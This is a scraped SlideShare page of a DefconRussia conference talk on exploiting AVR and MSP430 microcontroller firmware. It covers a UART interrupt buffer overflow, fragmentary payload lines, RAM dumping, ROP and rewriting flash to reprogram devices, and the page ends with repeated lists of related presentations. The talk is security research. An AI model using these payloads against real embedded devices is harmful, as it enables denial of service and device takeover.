SlideShare une entreprise Scribd logo

Vadim Bardakov - AVR & MSP exploitation

Télécharger en tant que PPTX, PDF
DefconRussia
DefconRussia
TechnologieActualités & Politique
1  sur  34
AVR & MSP exploitation Vadim Bardakov Security Researcher Digital Security (ERPScan)
AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices © 2002—2013, Digital Security 2
AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices • Inc. amount of easily accessible data channels • Microcontroller firmware can be retrieved © 2002—2013, Digital Security 3
AVR & MSP exploitation Jokes © 2002—2013, Digital Security 4
AVR & MSP exploitation What if it works? © 2002—2013, Digital Security 5
AVR & MSP exploitation Oops… © 2002—2013, Digital Security 6
AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis © 2002—2013, Digital Security 7
AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis • Planarization • etc. © 2002—2013, Digital Security 8
AVR & MSP exploitation Firmware extraction MSP430: • FRAM • 5xx • 6xx © 2002—2013, Digital Security 9
AVR & MSP exploitation RAM MSP © 2002—2013, Digital Security AVR 10
AVR & MSP exploitation RAM General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 11
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 12
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers SP Additional I/O registers Internal RAM © 2002—2013, Digital Security ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 13
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security Additional I/O registers Internal RAM SP ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 14
AVR & MSP exploitation Stack errors General purpose registers SP Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security I/O Special Function Registers Additional I/O registers Internal RAM ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 15
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 16
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 17
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 18
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 19
AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Seems OK I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Unknown offset Global Variables Internal RAM © 2002—2013, Digital Security 21
AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Bypassing checks © 2002—2013, Digital Security Internal RAM 22
AVR & MSP exploitation Buffer overflow Access: • Local variables • Return address: • Compiler-generated instructions • Interruption • Bootloader © 2002—2013, Digital Security 23
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } Casual for UART handlers © 2002—2013, Digital Security 24
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xB . “x010xFC”xN Atmel Studio 6.1 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 25
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 26
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 DoS © 2002—2013, Digital Security 27
AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } void uart_puts(const char *s ) { while (*s) uart_putc(*s++); print “xff”xB . “x010xFC”xN. P uart_puts(p); 000001C8 LDD R24,Y+1 000001CA LDD R25, Y+2 000001CB CALL 0x0000014E Load indirect with displacement Load immediate Call subroutine Dumping RAM } © 2002—2013, Digital Security 28
AVR & MSP exploitation Reprogramming © 2002—2013, Digital Security 29
AVR & MSP exploitation Reprogramming Open-source bootloaders sucks in production. © 2002—2013, Digital Security 30
AVR & MSP exploitation Reprogramming Load code to RAM print “xff”xB . “x000x16”xN. ROPTail Interruption handler Ideal for ROP © 2002—2013, Digital Security 31
AVR & MSP exploitation Reprogramming Gain control to SPM print Code . “x000xFC”xN. P Atmex +00000343: 95E8 …. +00000351: 95E8 SPM Store program memory SPM Store program memory Writing code to FLASH © 2002—2013, Digital Security 32
AVR & MSP exploitation Sum • Simple attacks can be conducted blindly • Different consequences: • DoS • Modifying device configuration • etc. © 2002—2013, Digital Security 33
Digital Security in Moscow: +7 (495) 223-07-86 Digital Security in Saint Petersburg: +7 (812) 703-15-47 www.dsec.ru www.erpscan.com v.bardakov@dsec.ru © 2002—2013, Digital Security 34

Recommandé

Safety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemSafety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemAleksandr Timorin
 
Centum VP - Evolution of Yokogawa System Solutions (2014)
Centum VP - Evolution of Yokogawa System Solutions (2014)Centum VP - Evolution of Yokogawa System Solutions (2014)
Centum VP - Evolution of Yokogawa System Solutions (2014)Yokogawa
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersPositive Hack Days
 
Man in the middle attacks on IEC 60870-5-104
Man in the middle attacks on IEC 60870-5-104Man in the middle attacks on IEC 60870-5-104
Man in the middle attacks on IEC 60870-5-104pgmaynard
 
Yokogawa Safety Instrumented System -Prosafe RS
Yokogawa Safety Instrumented System -Prosafe RSYokogawa Safety Instrumented System -Prosafe RS
Yokogawa Safety Instrumented System -Prosafe RSAmit Sharma
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersAleksandr Timorin
 
Security testing in critical systems
Security testing in critical systemsSecurity testing in critical systems
Security testing in critical systemsPeter Wood
 
ARM uVisor Debug Refinement Project(debugging facility improvements)
ARM uVisor Debug Refinement Project(debugging facility improvements)ARM uVisor Debug Refinement Project(debugging facility improvements)
ARM uVisor Debug Refinement Project(debugging facility improvements)家榮 張
 

Recommandé

Safety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemSafety vs Security: How to Create Insecure Safety-Critical System
Safety vs Security: How to Create Insecure Safety-Critical SystemAleksandr Timorin
 
Centum VP - Evolution of Yokogawa System Solutions (2014)
Centum VP - Evolution of Yokogawa System Solutions (2014)Centum VP - Evolution of Yokogawa System Solutions (2014)
Centum VP - Evolution of Yokogawa System Solutions (2014)Yokogawa
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersPositive Hack Days
 
Man in the middle attacks on IEC 60870-5-104
Man in the middle attacks on IEC 60870-5-104Man in the middle attacks on IEC 60870-5-104
Man in the middle attacks on IEC 60870-5-104pgmaynard
 
Yokogawa Safety Instrumented System -Prosafe RS
Yokogawa Safety Instrumented System -Prosafe RSYokogawa Safety Instrumented System -Prosafe RS
Yokogawa Safety Instrumented System -Prosafe RSAmit Sharma
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersAleksandr Timorin
 
Security testing in critical systems
Security testing in critical systemsSecurity testing in critical systems
Security testing in critical systemsPeter Wood
 
ARM uVisor Debug Refinement Project(debugging facility improvements)
ARM uVisor Debug Refinement Project(debugging facility improvements)ARM uVisor Debug Refinement Project(debugging facility improvements)
ARM uVisor Debug Refinement Project(debugging facility improvements)家榮 張
 
Improving SCADA Security
Improving SCADA SecurityImproving SCADA Security
Improving SCADA SecurityNarinrit Prem-apiwathanokul
 
FieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardFieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardYokogawa
 
Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Jorge_Rod
 
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat SheetICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat Sheetqqlan
 
3 diagnostic
3 diagnostic3 diagnostic
3 diagnosticconfidencial
 
Axis Camera Companion
Axis Camera Companion Axis Camera Companion
Axis Camera Companion bethhaldane
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsAleksandr Timorin
 
Flexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreFlexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreChristian Pfaeffli
 
Audio Visual Control Systems
Audio Visual Control SystemsAudio Visual Control Systems
Audio Visual Control Systemssonn jita
 
Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013ifm electronic gmbh
 
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiDefcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiPriyanka Aash
 
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Technogroovy
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAleksandr Timorin
 
Protecting Your DNP3 Networks
Protecting Your DNP3 NetworksProtecting Your DNP3 Networks
Protecting Your DNP3 NetworksChris Sistrunk
 
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...InfinIT - Innovationsnetværket for it
 
Turnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CatalogueTurnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CataloguePERCo
 
G120 cu250 s2_kba1_0414_eng_en-us
G120 cu250 s2_kba1_0414_eng_en-usG120 cu250 s2_kba1_0414_eng_en-us
G120 cu250 s2_kba1_0414_eng_en-usSanjeewa Siriwardana
 
S4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsS4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsMarina Krotofil
 
SCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureSCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureqqlan
 
Yokogawa Centum VP
Yokogawa Centum VPYokogawa Centum VP
Yokogawa Centum VPAllan Moreira
 
Never Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCNever Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCAlexander Bolshev
 
Hardware hacking for software people
Hardware hacking for software peopleHardware hacking for software people
Hardware hacking for software peopleDobrica Pavlinušić
 

Contenu connexe

Tendances

FieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardFieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardYokogawa
 
Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Jorge_Rod
 
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat SheetICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat Sheetqqlan
 
Axis Camera Companion
Axis Camera Companion Axis Camera Companion
Axis Camera Companion bethhaldane
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsAleksandr Timorin
 
Flexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreFlexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreChristian Pfaeffli
 
Audio Visual Control Systems
Audio Visual Control SystemsAudio Visual Control Systems
Audio Visual Control Systemssonn jita
 
Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013ifm electronic gmbh
 
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiDefcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiPriyanka Aash
 
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Technogroovy
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAleksandr Timorin
 
Protecting Your DNP3 Networks
Protecting Your DNP3 NetworksProtecting Your DNP3 Networks
Protecting Your DNP3 NetworksChris Sistrunk
 
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...InfinIT - Innovationsnetværket for it
 
Turnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CatalogueTurnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CataloguePERCo
 
S4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsS4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsMarina Krotofil
 
SCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureSCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureqqlan
 

Tendances (20)

Improving SCADA Security
Improving SCADA SecurityImproving SCADA Security
Improving SCADA Security
 
FieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management WizardFieldMate - Versatile Device Management Wizard
FieldMate - Versatile Device Management Wizard
 
Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0Tcp232 t24-getting started manual v1.0
Tcp232 t24-getting started manual v1.0
 
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat SheetICS/SCADA/PLC Google/Shodanhq Cheat Sheet
ICS/SCADA/PLC Google/Shodanhq Cheat Sheet
 
3 diagnostic
3 diagnostic3 diagnostic
3 diagnostic
 
Axis Camera Companion
Axis Camera Companion Axis Camera Companion
Axis Camera Companion
 
Scada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanismsScada deep inside: protocols and security mechanisms
Scada deep inside: protocols and security mechanisms
 
Flexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see moreFlexible Axis cameras, that let you see more
Flexible Axis cameras, that let you see more
 
Audio Visual Control Systems
Audio Visual Control SystemsAudio Visual Control Systems
Audio Visual Control Systems
 
Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013Ifm Technology for Mining Industries English 2013
Ifm Technology for Mining Industries English 2013
 
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fiDefcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
Defcon 22-phil-polstra-cyber-hijacking-airplanes-truth-or-fi
 
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
Industrial Training|Summer Training|Embedded Systems|Final Year Project|B tec...
 
Attacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVEAttacking SCADA systems: Story Of SCADASTRANGELOVE
Attacking SCADA systems: Story Of SCADASTRANGELOVE
 
Protecting Your DNP3 Networks
Protecting Your DNP3 NetworksProtecting Your DNP3 Networks
Protecting Your DNP3 Networks
 
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
Apps for Industrial Devices som understøttes af HVM'en. Alternativer, så som ...
 
Turnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo CatalogueTurnstiles & Access Control Systems. PERCo Catalogue
Turnstiles & Access Control Systems. PERCo Catalogue
 
G120 cu250 s2_kba1_0414_eng_en-us
G120 cu250 s2_kba1_0414_eng_en-usG120 cu250 s2_kba1_0414_eng_en-us
G120 cu250 s2_kba1_0414_eng_en-us
 
S4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsicsS4x16 europe krotofil_granular_dataflowsics
S4x16 europe krotofil_granular_dataflowsics
 
SCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architectureSCADA deep inside:protocols and software architecture
SCADA deep inside:protocols and software architecture
 
Yokogawa Centum VP
Yokogawa Centum VPYokogawa Centum VP
Yokogawa Centum VP
 

En vedette

Never Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCNever Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCAlexander Bolshev
 
Hardware hacking for software people
Hardware hacking for software peopleHardware hacking for software people
Hardware hacking for software peopleDobrica Pavlinušić
 
Hardware Hacking
Hardware HackingHardware Hacking
Hardware Hackingrngtng
 
Return-Oriented Programming: Exploits Without Code Injection
Return-Oriented Programming: Exploits Without Code InjectionReturn-Oriented Programming: Exploits Without Code Injection
Return-Oriented Programming: Exploits Without Code Injectionguest9f4856
 
AVR Assembler - ChiPy Ultimate Language Shootout 2016
AVR Assembler - ChiPy Ultimate Language Shootout 2016AVR Assembler - ChiPy Ultimate Language Shootout 2016
AVR Assembler - ChiPy Ultimate Language Shootout 2016Nick Timkovich
 
Hardware Hacking and Arduinos
Hardware Hacking and ArduinosHardware Hacking and Arduinos
Hardware Hacking and ArduinosHoward Mao
 
Arduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd PerspectiveArduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd PerspectiveHoward Lewis Ship
 
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardwareXVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardwareMarcus Botacin
 
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱 Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱Hugh Choi 최형욱
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangLyon Yang
 
Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Luis Grangeia
 
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판Minseok(Jacky) Cha
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Luis Grangeia
 
Calidad de la salud en colombia diapositivas
Calidad de la salud en colombia diapositivasCalidad de la salud en colombia diapositivas
Calidad de la salud en colombia diapositivasLIZZTOBON
 
Analyzing Vulnerabilities in the Internet of Things
Analyzing Vulnerabilities in the Internet of ThingsAnalyzing Vulnerabilities in the Internet of Things
Analyzing Vulnerabilities in the Internet of ThingsIke Clinton
 
사물인터넷, 이제는 서비스다!
사물인터넷, 이제는 서비스다!사물인터넷, 이제는 서비스다!
사물인터넷, 이제는 서비스다!Hakyong Kim
 

En vedette (20)

Never Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADCNever Trust Your Inputs or how to fool an ADC
Never Trust Your Inputs or how to fool an ADC
 
Hardware hacking for software people
Hardware hacking for software peopleHardware hacking for software people
Hardware hacking for software people
 
Hardware Hacking
Hardware HackingHardware Hacking
Hardware Hacking
 
Return-Oriented Programming: Exploits Without Code Injection
Return-Oriented Programming: Exploits Without Code InjectionReturn-Oriented Programming: Exploits Without Code Injection
Return-Oriented Programming: Exploits Without Code Injection
 
AVR Assembler - ChiPy Ultimate Language Shootout 2016
AVR Assembler - ChiPy Ultimate Language Shootout 2016AVR Assembler - ChiPy Ultimate Language Shootout 2016
AVR Assembler - ChiPy Ultimate Language Shootout 2016
 
Return Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part IReturn Oriented Programming (ROP) Based Exploits - Part I
Return Oriented Programming (ROP) Based Exploits - Part I
 
Hardware Hacking and Arduinos
Hardware Hacking and ArduinosHardware Hacking and Arduinos
Hardware Hacking and Arduinos
 
Arduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd PerspectiveArduino: Open Source Hardware Hacking from the Software Nerd Perspective
Arduino: Open Source Hardware Hacking from the Software Nerd Perspective
 
Hacking Techniques
Hacking TechniquesHacking Techniques
Hacking Techniques
 
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardwareXVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
XVII SBSEG: Detecção de ataques por ROP em tempo real assistida por hardware
 
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱 Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
Internet of things : 세상의 모든것들이 연결되는 날 - 최형욱
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon YangPractical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
 
Arduino Anatomy
Arduino AnatomyArduino Anatomy
Arduino Anatomy
 
Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2Reverse Engineering the TomTom Runner pt. 2
Reverse Engineering the TomTom Runner pt. 2
 
Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판Embedded linux 악성코드 동향 20150323 v1.0 공개판
Embedded linux 악성코드 동향 20150323 v1.0 공개판
 
Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1 Reverse Engineering the TomTom Runner pt. 1
Reverse Engineering the TomTom Runner pt. 1
 
Calidad de la salud en colombia diapositivas
Calidad de la salud en colombia diapositivasCalidad de la salud en colombia diapositivas
Calidad de la salud en colombia diapositivas
 
Exploits & Mitigations - Memory Corruption Techniques
Exploits & Mitigations - Memory Corruption TechniquesExploits & Mitigations - Memory Corruption Techniques
Exploits & Mitigations - Memory Corruption Techniques
 
Analyzing Vulnerabilities in the Internet of Things
Analyzing Vulnerabilities in the Internet of ThingsAnalyzing Vulnerabilities in the Internet of Things
Analyzing Vulnerabilities in the Internet of Things
 
사물인터넷, 이제는 서비스다!
사물인터넷, 이제는 서비스다!사물인터넷, 이제는 서비스다!
사물인터넷, 이제는 서비스다!
 

Similaire à Vadim Bardakov - AVR & MSP exploitation

QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdfQRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdfmindhackers161
 
39245147 intro-es-i
39245147 intro-es-i39245147 intro-es-i
39245147 intro-es-iEmbeddedbvp
 
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...Embarcados
 
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...Honeywell
 
SIMATIC manager سيماتك منجر سيمنز
SIMATIC manager سيماتك منجر سيمنزSIMATIC manager سيماتك منجر سيمنز
SIMATIC manager سيماتك منجر سيمنزEssosElectronic
 
S emb t10-development
S emb t10-developmentS emb t10-development
S emb t10-developmentJoão Moreira
 
What's New with ATTACK for ICS?
What's New with ATTACK for ICS?What's New with ATTACK for ICS?
What's New with ATTACK for ICS?MITRE - ATT&CKcon
 
Efficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive FirmwareEfficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive FirmwareRiscure
 
Virtualization & Network Connectivity
Virtualization & Network Connectivity Virtualization & Network Connectivity
Virtualization & Network Connectivity itplant
 
Manual del sistema del controlador programable S7-200 CPU21x
Manual del sistema del controlador programable S7-200 CPU21xManual del sistema del controlador programable S7-200 CPU21x
Manual del sistema del controlador programable S7-200 CPU21xSANTIAGO PABLO ALBERTO
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON
 
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systemsDefcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systemsPriyanka Aash
 

Similaire à Vadim Bardakov - AVR & MSP exploitation (20)

UNIT-III ES.ppt
UNIT-III ES.pptUNIT-III ES.ppt
UNIT-III ES.ppt
 
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdfQRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
QRadar_CEddfdfdsfdfdfdfdfdfdfdfdfdfdff.pdf
 
39245147 intro-es-i
39245147 intro-es-i39245147 intro-es-i
39245147 intro-es-i
 
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
